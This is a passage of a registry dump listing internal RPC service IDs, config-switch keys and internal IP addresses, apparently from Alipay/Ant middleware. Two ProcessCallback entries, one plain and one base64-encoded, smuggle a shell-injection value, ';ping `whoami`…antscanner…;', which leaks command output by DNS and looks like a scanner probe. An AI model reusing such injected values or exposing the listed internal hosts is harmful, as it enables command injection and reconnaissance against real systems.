DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.profile.facade.ItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.outservice.rpc.api.SFSResourceRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.datasource.DataSourceFilterMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SceneDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.ob_finnet_pcconfig_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rinsight.common.base.spi.RinsightRpcDataService:1.0:dwkndGraphQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:overseaexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.InvoiceApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.SpecDateProductStockRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.instInfoTddlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.MsgBoxHotSpotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csguide.service.facade.api.FlowNodeOperatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.PrivilegeRequestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchorder.ordercenter.facade.service.OrderPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kbticketcenter.KbtTimeoutCallbackHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.recall.LifeMsgRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.schemacenter.common.service.facade.api.modelschema.ModelSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.syncLoanRepaySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rockcode.facade.TaskCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.mmng.drm.FuCardDrm.mmngWhiteHosts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-finlinkboss-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:REQUEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreement.repaydate.PcreditRepayDateAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvUserIdentityBindingInfoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.238.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antrecluse.facade.service.bo.OdiSchedulerBo:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.rule.ReservationRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","adatabus@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.icreditcore.common.service.facade.api.LoanCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.asset.AssetsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.platform.service.facade.v2.api.PlanApplyOrderCacheQueryServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:securitycds_async@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.164.149.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcomment.common.service.facade.comment.ReplyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algo.common.service.facade.api.ALOrgDecisionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.11.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.InsReCallApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.188.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","dataId#@#DEFAULT_INSTANCE_ID#@#groupId","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.finpwmXTradeDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ereon.biz.service.pressure.data.api.ErcInsertPressureDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.api.ApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmDLogErrOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_appxagg_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.geofencing.ldc.GeofenceServiceInCZone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointprod.commom.manage.facade.pointdispatch.instruction.PointDispatchInstructionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeProcessQueryFacade:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.core.service.graylog.LogParseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.resource.facade.V1ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.facade.EbppChargeOutInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acpmscore.facade.DeliverableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.212.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:aggrbillinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.anteye.data.DataSource:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.159.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linkw.common.service.facade.server.MachineManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_CONSUME#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.donenode.common.service.facade.resource.ResourceRegistryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_USERPURVIEW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_KABAOCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.PayOffManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.aipGenStartDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.relation.PlayUserRelationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@asop#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.superapires.facade.monitor.AlertTemplateRuleManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.74.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.242.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.caprod.service.ukey.facade.UkeyDriverInfoQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:fastChannelLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acspcore.common.service.InstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditutcore.common.service.facade.CreditOccupyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmemberprod.common.service.facade.api.tr.access.UserAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:@alipay/egg-fund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.common.service.facade.MngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;ping `whoami`33024869-uniqueId-104003029.antscanner.global.alipay.com;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:agmcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certifymng.revolmng.service.facade.PubConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliminiabilityprod.facade.api.InviteTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.231.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exratecenter.service.facade.api.ExRateCodeMappingQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.clientBillCacheExpire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:staffWorkAnniversaryDownloadCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cifprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.rcassetscenter.common.service.facade.api.RcGeneralLicenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgATKManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:orderSuccessHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.GiftCrowdQueryFacade:1.0:amyGiftMainQuery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_sycMaxTotalLimitProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:infosec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iotbspmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRoleGzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsettle.biz.service.common.test.TestMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditbenefit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.snapshot.api.RetrySnapshotMsgService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:aiStudioProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.queryResource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mydidcommun@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.ticket.api.MerchantTicketLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.biz.shared.qos.QosTask:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.prepay.PreVoucherOrderReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcCaseProgressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepTaskBizFacade:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:lifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.sign.MerchantSignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.LicenseItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.biz.service.secopschange.SecChangeStatisticService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:charityprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:katongprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CreditAgreementClientSwitch.shadowSwtichToRpc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.insdataprod.common.service.facade.survey.api.MultipleLoanDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pccontractprod.common.service.facade.admin.api.ContractFunctionAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.moneybox.MbRechargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinwormhole.common.service.facade.api.RpcMonitorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antpim.common.service.facade.catalog.BuCatalogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseUploadFileDeleteKeyRequestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.chaos.dig.facade.code.RiskControlFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paymentmng.service.facade.paydecision.PayDecisionDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloaninsight.common.service.facade.service.PotentialUserInsightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.blackitem.BlackItemWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.realright.IotRealRightManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:IjtwaW5nIGB3aG9hbWlgMzMwMjQ4NjktLTEwNDAwMzAzMC5hbnRzY2FubmVyLmdsb2JhbC5hbGlwYXkuY29tOyI=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.mashup.service.account.open.RegisterQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SystemParamSwitchResource.checkRiskWords,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbproxy.facade.AliDataQuerySPI:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.fileReadToOSS,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.poscore.finsignSequenceDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_SMSGW_CACHE_REFRESH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.biz.service.impl.rpc.PositionRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.finpwm.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:ahaselfcure@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.decision.IntelligentDecisionComponet:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.predictproxy.http.HttpModelPredictService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpwm.facade.api.AutoInvestPlanManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.timeSequenceSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","ikbservcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.giftprod.common.service.facade.mutualtask.MutualtaskCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.170.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecsign.common.service.facade.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.complain.service.facade.ReportTaskResultProcessService:1.0:contentReportResultProc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-reading-tiers-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitycore.common.service.facade.merchant.api.MerchantCertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINASMCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.core.TicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.240.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.finriskcenter.common.facade.api.guardian.ActionExecuteConditionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCLOANBENEFIT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.AccountLogRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.training.api.CstMaterialQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudatlas.accatracequery.facade.TraceLogDigestQueryService:1.0:Histore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:assetxp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskmodelpredict.common.service.facade.qualityprod.rpc.TrainingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.93.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeDRMConfigureImpl.eventBufLoadCount4Single,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_M_MCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.175.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.common.AssetMallItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.68.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorVerifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.76.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthprod.facade.CheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.121.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.UserCustomerShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpartner.service.facade.RigelLinkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zmyschecker.common.service.facade.servicemng.api.mng.ApplicationMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.CampMonitorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.biz.shared.security.CommonSecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.login.PamMobileLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudbox.cloudbox_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcmloanprod.common.service.facade.service.MiniLoanMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:custweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.recommend.LifeReportMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certifymng.service.tair.TairCacheService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.166.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitContainerLayoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceAnnualAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rcservcenter.client.RcClientInvoker:1.0:rcdmncore@DEFAULT#@#DEFAULT_INSTANCE_ID#@